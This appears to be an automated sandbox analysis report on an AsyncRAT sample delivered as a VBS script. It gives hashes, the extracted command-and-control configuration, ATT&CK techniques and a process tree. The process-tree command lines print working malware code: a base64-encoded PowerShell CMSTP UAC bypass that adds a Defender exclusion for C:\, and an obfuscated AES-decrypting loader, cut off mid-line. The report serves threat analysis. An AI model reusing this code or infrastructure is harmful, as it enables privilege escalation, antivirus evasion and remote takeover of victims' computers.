asyncrat | 20dd257e3dc3a5a45a864ae9de7e13e0800007b1241a5c4bc104a0ba69d9dcf3

Analysis

max time kernel
132s
max time network
149s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
26/12/2024, 22:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

scriper.index.config.vbs
Size

203KB
MD5

0277c2765732f368a0b5260a2f100d5f
SHA1

88b89fa52c3ef01f500c62eaa5d420e51bcd2eb3
SHA256

20dd257e3dc3a5a45a864ae9de7e13e0800007b1241a5c4bc104a0ba69d9dcf3
SHA512

f11d1b42e1b1255044eb3dcbf3f625506174600c2f36f06847f050cafea8d5001506b34b3beafe5352b925b5dc873af9523aaab83bafde8db9177fa281b1371b
SSDEEP

1536:abfH0KjpWwyBGjb59fSpcnZmDf+c+CMG3892XEtSPeVDr+HeOubxS8fddN:a7H0KjppKkJSSuf+c+Zo/cP+0bxS81T

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

jt8iyre.localto.net:2101

jt8iyre.localto.net:55644

Mutex

E0GLVPl3iUqi

Attributes

delay
3
install
false
install_file
winserve.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral3/memory/3408-127-0x0000000007250000-0x0000000007262000-memory.dmp	family_asyncrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
39	3408	powershell.exe
43	3408	powershell.exe
44	3408	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3128	powershell.exe
1416	powershell.exe
1712	powershell.exe
2508	powershell.exe
3408	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4912	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
3128	powershell.exe
3128	powershell.exe
1416	powershell.exe
1416	powershell.exe
1712	powershell.exe
1712	powershell.exe
2508	powershell.exe
2508	powershell.exe
3408	powershell.exe
3408	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeIncreaseQuotaPrivilege	1416	powershell.exe
Token: SeSecurityPrivilege	1416	powershell.exe
Token: SeTakeOwnershipPrivilege	1416	powershell.exe
Token: SeLoadDriverPrivilege	1416	powershell.exe
Token: SeSystemProfilePrivilege	1416	powershell.exe
Token: SeSystemtimePrivilege	1416	powershell.exe
Token: SeProfSingleProcessPrivilege	1416	powershell.exe
Token: SeIncBasePriorityPrivilege	1416	powershell.exe
Token: SeCreatePagefilePrivilege	1416	powershell.exe
Token: SeBackupPrivilege	1416	powershell.exe
Token: SeRestorePrivilege	1416	powershell.exe
Token: SeShutdownPrivilege	1416	powershell.exe
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeSystemEnvironmentPrivilege	1416	powershell.exe
Token: SeRemoteShutdownPrivilege	1416	powershell.exe
Token: SeUndockPrivilege	1416	powershell.exe
Token: SeManageVolumePrivilege	1416	powershell.exe
Token: 33	1416	powershell.exe
Token: 34	1416	powershell.exe
Token: 35	1416	powershell.exe
Token: 36	1416	powershell.exe
Token: SeDebugPrivilege	4912	taskkill.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeIncreaseQuotaPrivilege	2508	powershell.exe
Token: SeSecurityPrivilege	2508	powershell.exe
Token: SeTakeOwnershipPrivilege	2508	powershell.exe
Token: SeLoadDriverPrivilege	2508	powershell.exe
Token: SeSystemProfilePrivilege	2508	powershell.exe
Token: SeSystemtimePrivilege	2508	powershell.exe
Token: SeProfSingleProcessPrivilege	2508	powershell.exe
Token: SeIncBasePriorityPrivilege	2508	powershell.exe
Token: SeCreatePagefilePrivilege	2508	powershell.exe
Token: SeBackupPrivilege	2508	powershell.exe
Token: SeRestorePrivilege	2508	powershell.exe
Token: SeShutdownPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeSystemEnvironmentPrivilege	2508	powershell.exe
Token: SeRemoteShutdownPrivilege	2508	powershell.exe
Token: SeUndockPrivilege	2508	powershell.exe
Token: SeManageVolumePrivilege	2508	powershell.exe
Token: 33	2508	powershell.exe
Token: 34	2508	powershell.exe
Token: 35	2508	powershell.exe
Token: 36	2508	powershell.exe
Token: SeIncreaseQuotaPrivilege	2508	powershell.exe
Token: SeSecurityPrivilege	2508	powershell.exe
Token: SeTakeOwnershipPrivilege	2508	powershell.exe
Token: SeLoadDriverPrivilege	2508	powershell.exe
Token: SeSystemProfilePrivilege	2508	powershell.exe
Token: SeSystemtimePrivilege	2508	powershell.exe
Token: SeProfSingleProcessPrivilege	2508	powershell.exe
Token: SeIncBasePriorityPrivilege	2508	powershell.exe
Token: SeCreatePagefilePrivilege	2508	powershell.exe
Token: SeBackupPrivilege	2508	powershell.exe
Token: SeRestorePrivilege	2508	powershell.exe
Token: SeShutdownPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeSystemEnvironmentPrivilege	2508	powershell.exe
Token: SeRemoteShutdownPrivilege	2508	powershell.exe
Token: SeUndockPrivilege	2508	powershell.exe
Token: SeManageVolumePrivilege	2508	powershell.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 5064 wrote to memory of 3128	5064	WScript.exe	82
PID 5064 wrote to memory of 3128	5064	WScript.exe	82
PID 3128 wrote to memory of 1256	3128	powershell.exe	86
PID 3128 wrote to memory of 1256	3128	powershell.exe	86
PID 1256 wrote to memory of 3032	1256	csc.exe	87
PID 1256 wrote to memory of 3032	1256	csc.exe	87
PID 3128 wrote to memory of 1808	3128	powershell.exe	88
PID 3128 wrote to memory of 1808	3128	powershell.exe	88
PID 5064 wrote to memory of 3876	5064	WScript.exe	102
PID 5064 wrote to memory of 3876	5064	WScript.exe	102
PID 3876 wrote to memory of 1712	3876	cmd.exe	104
PID 3876 wrote to memory of 1712	3876	cmd.exe	104
PID 3876 wrote to memory of 1712	3876	cmd.exe	104
PID 1712 wrote to memory of 2508	1712	powershell.exe	105
PID 1712 wrote to memory of 2508	1712	powershell.exe	105
PID 1712 wrote to memory of 2508	1712	powershell.exe	105
PID 1712 wrote to memory of 4596	1712	powershell.exe	108
PID 1712 wrote to memory of 4596	1712	powershell.exe	108
PID 1712 wrote to memory of 4596	1712	powershell.exe	108
PID 4596 wrote to memory of 3712	4596	WScript.exe	109
PID 4596 wrote to memory of 3712	4596	WScript.exe	109
PID 4596 wrote to memory of 3712	4596	WScript.exe	109
PID 3712 wrote to memory of 3408	3712	cmd.exe	111
PID 3712 wrote to memory of 3408	3712	cmd.exe	111
PID 3712 wrote to memory of 3408	3712	cmd.exe	111

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\scriper.index.config.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3128
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2zjkorqd\2zjkorqd.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1256
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8201.tmp" "c:\Users\Admin\AppData\Local\Temp\2zjkorqd\CSC846A34AA4A234D0E8C60F94B311B9B9D.TMP"
      4⤵
      PID:3032
- - C:\windows\system32\cmstp.exe
    "C:\windows\system32\cmstp.exe" /au C:\windows\temp\klur315b.inf
    3⤵
    PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3876
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+4QKE1J0K9CBQq122My7d9xjYIEzvU8nKu3pXsE/60I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VwAnjqEmBh3DPh2idDTQQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$hShqt=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$Wtaby=New-Object System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$wQXJL=New-Object System.IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAeOBFOBFUSCUDAssOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAGZOBFOBFUSCUDAipOBFOBFUSCUDAStOBFOBFUSCUDAreOBFOBFUSCUDAamOBFOBFUSCUDA($hShqt, [IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAesOBFOBFUSCUDAsiOBFOBFUSCUDAonOBFOBFUSCUDA.CoOBFOBFUSCUDAmpOBFOBFUSCUDAreOBFOBFUSCUDAssOBFOBFUSCUDAiOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAMode]::DOBFOBFUSCUDAeOBFOBFUSCUDAcOBFOBFUSCUDAompOBFOBFUSCUDAreOBFOBFUSCUDAss);'.Replace('OBFOBFUSCUDA', ''); $wQXJL.CopyTo($Wtaby); $wQXJL.Dispose(); $hShqt.Dispose(); $Wtaby.Dispose(); $Wtaby.ToArray();}function execute_function($param_var,$param2_var){ IEX 